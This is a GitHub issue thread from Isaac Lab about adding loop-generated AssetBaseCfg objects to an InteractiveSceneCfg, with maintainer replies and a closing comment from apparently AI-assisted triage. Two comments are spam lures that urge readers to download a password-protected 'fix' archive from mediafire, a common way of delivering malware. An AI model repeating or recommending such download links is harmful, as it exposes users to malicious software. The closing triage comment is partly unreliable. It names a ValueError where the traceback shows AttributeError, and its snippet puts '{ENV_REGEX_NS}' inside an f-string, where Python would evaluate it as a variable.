isaac-sim/IsaacLab #880: [Question] How can I add several assets in the InteractiveSceneCfg with a For Loop?

jbt-cmu, 2024-08-26:
### Question

I would like to add several object assets like so:

```
    # object_1 = AssetBaseCfg(
    #     prim_path="{ENV_REGEX_NS}/Object_1",
    #     spawn=sim_utils.CuboidCfg(size=[0.3, 0.3, 0.3], visual_material=sim_utils.PreviewSurfaceCfg(diffuse_color=(0.0, 0.9, 0.0))),
    #     init_state=AssetBaseCfg.InitialStateCfg(pos=[3.5, 4.5, 0.95]))

    # object_2 = AssetBaseCfg(
    #     prim_path="{ENV_REGEX_NS}/Object_2",
    #     spawn=sim_utils.CuboidCfg(size=[0.3, 0.3, 0.3], visual_material=sim_utils.PreviewSurfaceCfg(diffuse_color=(0.0, 0.9, 0.0))),
    #     init_state=AssetBaseCfg.InitialStateCfg(pos=[4.3, 4.5, 0.95]))

    # object_3 = AssetBaseCfg(
    #     prim_path="{ENV_REGEX_NS}/Object_3",
    #     spawn=sim_utils.CuboidCfg(size=[0.3, 0.3, 0.3], visual_material=sim_utils.PreviewSurfaceCfg(diffuse_color=(0.0, 0.9, 0.0))),
    #     init_state=AssetBaseCfg.InitialStateCfg(pos=[4.8, 4.5, 0.95]))
```

using a for loop, like so:

```
objects = []

# Base position values
base_x = 3.5
y_pos = 4.5
z_pos = 0.95

# Create 9 objects with an offset of 0.3 meters on the x-axis
for i in range(9):
    obj = AssetBaseCfg(
        prim_path=f"/World/Object_{i+1}",  # Replace "/World" with your desired namespace
        spawn=sim_utils.CuboidCfg(size=[0.3, 0.3, 0.3], visual_material=sim_utils.PreviewSurfaceCfg(diffuse_color=(0.0, 0.9, 0.0))),
        init_state=AssetBaseCfg.InitialStateCfg(pos=[base_x + i*0.3, y_pos, z_pos])
    )
    objects.append(obj)
```

However, this provides the following error:

```
Traceback (most recent call last):
  File "C:\Users\Owner\Documents\GitHub\IsaacLab\source\standalone\demos\ada\ada.py", line 349, in <module>
    main()
  File "C:\Users\Owner\Documents\GitHub\IsaacLab\source\standalone\demos\ada\ada.py", line 326, in main
    env = CameraAgentEnv()
  File "C:\Users\Owner\Documents\GitHub\IsaacLab\source\standalone\demos\ada\ada.py", line 234, in __init__
    self.scene = self.create_scene()
  File "C:\Users\Owner\Documents\GitHub\IsaacLab\source\standalone\demos\ada\ada.py", line 256, in create_scene
    scene = InteractiveScene(scene_cfg)
  File "c:\users\owner\documents\github\isaaclab\source\extensions\omni.isaac.lab\omni\isaac\lab\scene\interactive_scene.py", line 145, in __init__
    self._add_entities_from_cfg()
  File "c:\users\owner\documents\github\isaaclab\source\extensions\omni.isaac.lab\omni\isaac\lab\scene\interactive_scene.py", line 444, in _add_entities_from_cfg
    asset_cfg.prim_path = asset_cfg.prim_path.format(ENV_REGEX_NS=self.env_regex_ns)
AttributeError: 'list' object has no attribute 'prim_path'
```

How can I do this properly?

mabhi02, 2024-08-26:
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

uno-zero, 2024-08-26:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

Mayankm96, 2024-08-27:
You can potentially do this operation inside the `__init__` of the InteractiveSceneCfg.

RandomOakForest, 2025-01-05:
Thank you for posting this. Let us know if you still need help.

AntoineRichard, 2026-08-27:
Thanks @jbt-cmu for the question.

`InteractiveSceneCfg` picks up every non-`None` attribute you set on it and dispatches on the config type, so a list assigned to one field isn't recognized as an asset config and raises `ValueError: Unknown asset config type for ...`. Set each entry as its own named attribute instead, e.g. in `__post_init__`: `setattr(self, f"object_{i}", AssetBaseCfg(prim_path=f"{ENV_REGEX_NS}/Object_{i}", ...))`; `{ENV_REGEX_NS}` keeps per-environment cloning working. The scan lives in `isaaclab/scene/interactive_scene.py`. Closing for inactivity — please reopen with a repro if this still trips you up.

---
*🤖 This issue was reviewed as part of an AI-assisted triage of the Isaac Lab backlog, with automated verification against the current codebase. If we got this wrong, please reopen — we'd rather hear about it!*

closed 2026-08-27 by AntoineRichard